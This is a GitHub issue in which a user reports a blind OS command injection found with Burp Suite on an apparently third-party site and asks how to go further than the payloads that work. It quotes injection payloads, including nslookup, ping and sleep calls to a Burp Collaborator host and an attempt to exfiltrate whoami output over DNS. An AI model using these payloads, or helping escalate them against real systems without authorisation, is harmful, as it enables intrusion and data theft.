hacktricks icon indicating copy to clipboard operation
hacktricks copied to clipboard

out-of-band data exfiltration Command Injection Problem

Open Deviandorex opened this issue 1 year ago • 0 comments

Hello friend, I was reviewing your profile and I think you are the right person for the help I need.

A few days ago I found a vulnerability in a site of interest through burp suite scanner using nslookup xxx.burpcolaborator.com exploit with the following feature

Issue: OS command injection Severity: High Confidence: Certain

Screenshot from 2023-12-08 20-29-32

the vulnerability only responds when using ` and only responds to the nslookup, sleep and ping including the burp colaborator. 1

Screenshot from 2023-12-08 20-35-28

These are the only commands it respond to.

nslookup xxx.burpcolaborator.com ping xxx.burpcolaborator.com sleep 10

other commands like nslookup $(whoami).xxx.burp collaborator.com They do not give any answer, please I would appreciate it if you could help me with this problem since I cannot find a way to exploit this vulnerability and I want it to execute other commands apart from nslookup or sleep.

I await your response. Thanx

Deviandorex avatar Dec 14 '23 14:12 Deviandorex